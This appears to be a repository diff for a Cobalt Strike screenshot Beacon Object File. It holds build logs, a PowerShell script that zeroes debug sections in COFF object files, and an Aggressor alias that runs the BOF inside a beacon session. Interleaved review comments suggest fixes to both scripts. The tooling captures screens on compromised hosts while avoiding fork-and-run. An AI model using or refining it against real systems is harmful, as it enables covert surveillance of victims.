c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.command.1.tlog
|
||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.read.1.tlog
|
||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.write.1.tlog
|
|
@ -0,0 +1,7 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project>
|
||||
<ProjectOutputs>C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\bin\BOF\ScreenshotBOFx32</ProjectOutputs>
|
||||
<ContentFiles></ContentFiles>
|
||||
<SatelliteDlls></SatelliteDlls>
|
||||
<NonRecipeFileRefs></NonRecipeFileRefs>
|
||||
</Project>
|
Binary file not shown.
|
@ -0,0 +1,127 @@
|
|||
function strip-bof {
|
||||
<#
|
||||
.SYNOPSIS
|
||||
Removes debug symbols from a beacon object file
|
||||
|
||||
Heavily dependent on code by Matthew Graeber (@mattifestation)
|
||||
Original code: https://www.powershellgallery.com/packages/PowerSploit/1.0.0.0/Content/PETools%5CGet-ObjDump.ps1
|
||||
Author: Yasser Alhazmi (@yas_o_h)
|
||||
License: BSD 3-Clause
|
||||
|
||||
.PARAMETER Path
|
||||
|
||||
Specifies a path to one or more object file locations.
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
C:\PS>strip-bof -Path main.obj
|
||||
|
||||
#>
|
||||
|
||||
[CmdletBinding()] Param (
|
||||
[Parameter(Position = 0, Mandatory = $True)]
|
||||
[ValidateScript({ Test-Path $_ })]
|
||||
[String]
|
||||
$Path
|
||||
)
|
||||
|
||||
|
||||
$Code = @'
|
||||
using System;
|
||||
using System.IO;
|
||||
using System.Text;
|
||||
|
||||
namespace COFF
|
||||
{
|
||||
|
||||
|
||||
public class SECTION_HEADER
|
||||
{
|
||||
public string Name;
|
||||
public uint PhysicalAddress;
|
||||
public uint VirtualSize;
|
||||
public uint VirtualAddress;
|
||||
public uint SizeOfRawData;
|
||||
public uint PointerToRawData;
|
||||
public uint PointerToRelocations;
|
||||
public uint PointerToLinenumbers;
|
||||
public ushort NumberOfRelocations;
|
||||
public ushort NumberOfLinenumbers;
|
||||
public uint Characteristics;
|
||||
public Byte[] RawData;
|
||||
|
||||
public SECTION_HEADER(BinaryReader br)
|
||||
{
|
||||
this.Name = Encoding.UTF8.GetString(br.ReadBytes(8)).Split((Char) 0)[0];
|
||||
this.PhysicalAddress = br.ReadUInt32();
|
||||
this.VirtualSize = this.PhysicalAddress;
|
||||
this.VirtualAddress = br.ReadUInt32();
|
||||
this.SizeOfRawData = br.ReadUInt32();
|
||||
this.PointerToRawData = br.ReadUInt32();
|
||||
this.PointerToRelocations = br.ReadUInt32();
|
||||
this.PointerToLinenumbers = br.ReadUInt32();
|
||||
this.NumberOfRelocations = br.ReadUInt16();
|
||||
this.NumberOfLinenumbers = br.ReadUInt16();
|
||||
this.Characteristics = br.ReadUInt32();
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
public class HEADER
|
||||
{
|
||||
public ushort Machine;
|
||||
public ushort NumberOfSections;
|
||||
public uint TimeDateStamp;
|
||||
public uint PointerToSymbolTable;
|
||||
public uint NumberOfSymbols;
|
||||
public ushort SizeOfOptionalHeader;
|
||||
public ushort Characteristics;
|
||||
|
||||
public HEADER(BinaryReader br)
|
||||
{
|
||||
this.Machine = br.ReadUInt16();
|
||||
this.NumberOfSections = br.ReadUInt16();
|
||||
this.TimeDateStamp = br.ReadUInt32();
|
||||
this.PointerToSymbolTable = br.ReadUInt32();
|
||||
this.NumberOfSymbols = br.ReadUInt32();
|
||||
this.SizeOfOptionalHeader = br.ReadUInt16();
|
||||
this.Characteristics = br.ReadUInt16();
|
||||
}
|
||||
}
|
||||
}
|
||||
'@
|
||||
|
||||
Add-Type -TypeDefinition $Code
|
||||
Write-Host "enumerating sections..."
|
||||
try {
|
||||
$FileStream = [IO.File]::OpenRead($Path)
|
||||
$BinaryReader = New-Object IO.BinaryReader($FileStream)
|
||||
$CoffHeader = New-Object COFF.HEADER($BinaryReader)
|
||||
|
||||
# Parse section headers
|
||||
$SectionHeaders = New-Object COFF.SECTION_HEADER[]($CoffHeader.NumberOfSections)
|
||||
|
||||
for ($i = 0; $i -lt $CoffHeader.NumberOfSections; $i++)
|
||||
{
|
||||
$SectionHeaders[$i] = New-Object COFF.SECTION_HEADER($BinaryReader)
|
||||
|
||||
if($SectionHeaders[$i].Name.Contains("debug")){
|
||||
Write-Host "found debug section.. zeroing it..."
|
||||
$FileStream.Close();
|
||||
$FileStream2 = [IO.File]::OpenWrite($Path)
|
||||
$FileStream2.Seek($SectionHeaders[$i].PointerToRawData, 'Begin') | Out-Null
|
||||
for($x = 0; $x -lt $SectionHeaders[$i].SizeOfRawData; $x++){
|
||||
$FileStream2.WriteByte(0)
|
||||
}
|
||||
Write-Host "closing stream...";
|
||||
$FileStream2.Close();
|
||||
Write-Host "done!";
|
||||
return;
|
||||
}
|
||||
}
|
||||
} catch {
|
||||
Add-Type -AssemblyName PresentationFramework
|
||||
[System.Windows.MessageBox]::Show("error stripping debug symbols: " + $_.ToString());
|
||||
return;
|
||||
}
|
||||
}
|
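Review bot: The read handle opened at `$FileStream = [IO.File]::OpenRead($Path)` is only closed on the branch that finds a debug section, so when no section name contains "debug" the loop simply ends with both `$FileStream` and `$BinaryReader` still open, and the `catch` block leaks them as well. The `return;` after the first match also means at most one debug section is zeroed; if an object carries several (for example both `.debug$S` and `.debug$T`), the remaining ones keep their raw data. Parsing every section header first under try/finally and then zeroing all matching sections through a single write stream fixes both; the outer `catch` can stay, though since the build logs show this running as a post-build step, `Write-Error` would not stall an unattended build the way the modal MessageBox does. Note that only the raw data at `PointerToRawData` is overwritten, so the section headers and symbol table (and thus the debug section names) remain in the file.
```powershell
    try {
        $FileStream = [IO.File]::OpenRead($Path)
        $BinaryReader = New-Object IO.BinaryReader($FileStream)
        try {
            $CoffHeader = New-Object COFF.HEADER($BinaryReader)
            # Parse every section header before the file is reopened for writing
            $SectionHeaders = New-Object COFF.SECTION_HEADER[]($CoffHeader.NumberOfSections)
            for ($i = 0; $i -lt $CoffHeader.NumberOfSections; $i++) {
                $SectionHeaders[$i] = New-Object COFF.SECTION_HEADER($BinaryReader)
            }
        } finally {
            $BinaryReader.Close()   # also closes the underlying $FileStream
        }

        $DebugSections = @($SectionHeaders | Where-Object { $_.Name.Contains("debug") })
        if ($DebugSections.Count -eq 0) {
            Write-Host "no debug section found"
            return
        }

        $FileStream2 = [IO.File]::OpenWrite($Path)
        try {
            foreach ($Section in $DebugSections) {
                Write-Host "found debug section.. zeroing it..."
                $FileStream2.Seek($Section.PointerToRawData, 'Begin') | Out-Null
                for ($x = 0; $x -lt $Section.SizeOfRawData; $x++) {
                    $FileStream2.WriteByte(0)
                }
            }
        } finally {
            Write-Host "closing stream..."
            $FileStream2.Close()
        }
        Write-Host "done!"
    } catch {
        # … unchanged: error reporting …
    }
```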
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,21 @@
|
|||
#Register command
|
||||
beacon_command_register(
|
||||
"screenshot_bof",
|
||||
"Alternative screenshot capability that does not do fork n run",
|
||||
"Synopsis: screenshot_bof"
|
||||
);
|
||||
|
||||
alias screenshot_bof {
|
||||
local('$barch $handle $data $args $target_pid');
|
||||
println(@_);
|
||||
# figure out the arch of this session
|
||||
$barch = barch($1);
|
||||
# read in the right BOF file
|
||||
$handle = openf(script_resource("screenshotBOF. $+ $barch $+ .obj"));
|
||||
$data = readb($handle, -1);
|
||||
closef($handle);
|
||||
# announce what we're doing
|
||||
btask($1, "Running screenshot BOF by (@codex_tf2)");
|
||||
# execute it.
|
||||
beacon_inline_execute($1, $data, "go", $args);
|
||||
}
|
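Review bot: `$args` is declared in the `local(...)` line but never assigned, so `beacon_inline_execute($1, $data, "go", $args)` passes an empty value, `$target_pid` is declared and never used, and `println(@_);` looks like a debug leftover that dumps the raw alias arguments to the script console. Dropping the two unused locals and the `println`, and passing the argument explicitly, makes the intent visible: `beacon_inline_execute($1, $data, "go", $null);`. There is also no check that the object file was actually read; if the matching `screenshotBOF.<arch>.obj` is missing next to the script, `openf` presumably fails and the error only surfaces from Beacon, so a guard after `closef($handle);` such as `if (strlen($data) == 0) { berror($1, "could not read screenshotBOF. $+ $barch $+ .obj"); return; }` reports it at the right place.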